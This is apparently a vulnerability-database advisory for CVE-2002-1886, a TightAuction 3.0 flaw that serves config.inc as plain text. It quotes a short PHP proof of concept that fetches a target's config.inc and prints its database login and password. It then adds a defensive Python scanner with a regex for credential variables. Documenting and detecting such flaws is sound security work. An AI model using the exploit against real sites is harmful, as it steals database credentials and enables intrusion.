TightAuction Config.INC Information Disclosure Vulnerability

Vulnerability ID 1107019 Vulnerability type Configuration error
Published 2002-10-02 Updated 2005-10-20
CVE ID CVE-2002-1886
CNNVD-ID CNNVD-200212-555
Platform PHP CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/21893
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-555
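|Vulnerability details
TightAuction 3.0 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain the database username and password.
|Exploit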
source: http://www.securityfocus.com/bid/5850/info

TightAuction is prone to an information disclosure vulnerability. The configuration file (config.inc) contains sensitive information such as database authentication credentials. It is possible for remote attackers to retrieve this file via a web request, and since the file does not have the correct extension (.inc.php) the contents will be rendered in a web browser instead of interpreted.


<?
$victime="http://[target]";
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer :
$DB_Database");
?>
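
A defender-side check for the condition described above, as an added example that is not part of the original advisory or of TightAuction: it walks a document root and reports files that hold credential-style PHP variables but whose extension the server would return as plain text. The sample tree, its file contents and the assumption that only .php is mapped to the interpreter are constructed for illustration.

```python
import os
import re
import tempfile

# Assumption: only these extensions are handed to the PHP interpreter.
# Adjust to the web server's actual handler mapping.
INTERPRETED = (".php",)
# Variable names used by the advisory's config.inc, plus a generic password hint.
SECRET_RE = re.compile(r"\$DB_(Username|Password|Database)\b|\$\w*passw\w*\s*=", re.I)


def find_exposed_includes(docroot):
    """Return sorted relative paths of files under docroot that contain
    credential-like PHP variables but would be served as plain text."""
    exposed = []
    for base, _dirs, files in os.walk(docroot):
        for name in files:
            if name.lower().endswith(INTERPRETED):
                continue  # e.g. config.inc.php is executed, not displayed
            path = os.path.join(base, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read(65536)
            except OSError:
                continue  # unreadable file: nothing to inspect
            if "<?" in text and SECRET_RE.search(text):
                exposed.append(os.path.relpath(path, docroot))
    return sorted(exposed)


def build_sample_docroot():
    """Constructed sample tree: an exposed config.inc next to a config.inc.php."""
    root = tempfile.mkdtemp()
    body = '<?\n$DB_Username="auction";\n$DB_Password="example";\n$DB_Database="db";\n?>\n'
    for name in ("config.inc", "config.inc.php"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html>hello</html>")
    return root


if __name__ == "__main__":
    for rel in find_exposed_includes(build_sample_docroot()):
        print("served as plain text, contains credentials:", rel)
```

Files it reports should be moved outside the document root, renamed to an interpreted extension such as the .inc.php the advisory mentions, or denied by the server configuration.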
|References

Source: BID
Name: 5850
Link: http://www.securityfocus.com/bid/5850
Source: XF
Name: tightauction-config-information-disclosure(10310)
Link: http://www.iss.net/security_center/static/10310.php
Source: BUGTRAQ
Name: 20021002MultipleWebSecurityHoles
Link: http://archives.neohapsis.com/archives/bugtraq/2002-10/0016.html
